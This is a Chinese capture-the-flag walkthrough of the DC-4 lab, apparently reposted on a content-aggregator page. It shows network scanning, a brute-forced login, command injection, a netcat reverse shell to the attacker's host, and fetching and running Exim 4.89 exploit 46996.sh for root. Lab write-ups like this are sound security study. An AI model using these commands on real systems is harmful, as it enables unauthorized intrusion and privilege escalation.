当前位置: 首页 > news >正文

DC-4 靶场学习

信息搜集:

首先获取靶场ip,和之前一样。

arp-scan -l
nmap -sP 192.168.28.0/24

image-20230228170123671

然后访问。

发现需要登录。

漏洞分析:

image-20230228170152122

直接用bp爆破,爆破出来密码为happy,登录。

image-20230303155654501

发现执行了命令,抓包。

image-20230303155744771

修改命令可以执行,反弹一下shell试试。

反弹shell:

本地打开监听

nc -lvvp 9999

目标机主动连接

 nc <攻击机IP> <攻击机监听的端口> -e /bin/bash

image-20230303160123128

然后进入交互模式。

python -c "import pty;pty.spawn('/bin/bash')"

image-20230303160300869

然后用find命令找flag。

find / -name *flag*

没有找到,可能是权限不够,suid提权。

提权:

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现有/usr/sbin/exim4,看一下版本。

/usr/sbin/exim4 --version

image-20230303161520136

Exim version 4.89。

去搜一下paylaod。

searchsploit exim 4

image-20230303162031427

使用这个,本地起一个apache服务,然后将sh文件传入html页面。

systemctl start apache2.service
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html

然后在目标机器上下载payload。

wget http://192.168.28.128/46996.sh

直接下载会发现没有权限,所以说随便进入一个 有权限的目录里下载。

下载后给可执行权限。

chmod +x 46996.sh
./46996.sh

image-20230303162820123

得到flag:

然后在root里得到flag。

image-20230303163824600

http://www.lryc.cn/news/28369.html

相关文章:

  • QML组件
  • canvas 学习指南
  • 【华为OD机试2023】开心消消乐 C++
  • 学历?能力?
  • 使用ECharts打造一个数据可视化面板
  • 【论文简述】PVSNet: Pixelwise Visibility-Aware Multi-ViewStereo Network(arxiv 2020)
  • CSS隐藏元素的几种方式以及display、visibility、opacity的区别
  • 【Java|golang】1487. 保证文件名唯一---golang中string方法的坑
  • flstudio21水果language选项中文设置方法教程
  • Ubuntu中安装StaMPS
  • Spring Security 实现自定义登录和认证(1)
  • Linux 进程:辨析wait与waitpid
  • 移除元素(每日一题)
  • 打印名片-课后程序(Python程序开发案例教程-黑马程序员编著-第一章-课后作业)
  • 为啥预编译SQL能够防止SQL注入
  • IGKBoard(imx6ull)-SPI接口编程-回环测试
  • Python基础学习10——类
  • 项目实战典型案例14——代码结构混乱 逻辑边界不清晰 页面美观设计不足
  • SpringBoot 读取自定义Properties参数
  • 机器学习100天(三十七):037 朴素贝叶斯-挑个好西瓜!
  • c#遍历窗口,根据标题获取handle并显示窗口
  • MyBatis高频面试专题
  • 曹云金郭德纲关系迎曙光,新剧《猎黑行动》被德云社弟子齐点赞
  • 如何在 OpenEuler 系统中安装 Docker
  • MySQL日志管理
  • 进 制
  • pycharm关联github、新建以及更新仓
  • java基础知识之小碎片(自问自答版本)---嘻嘻,春招加油呀~
  • 蚁群算法c++
  • 北大青鸟天府校区IT学习大揭秘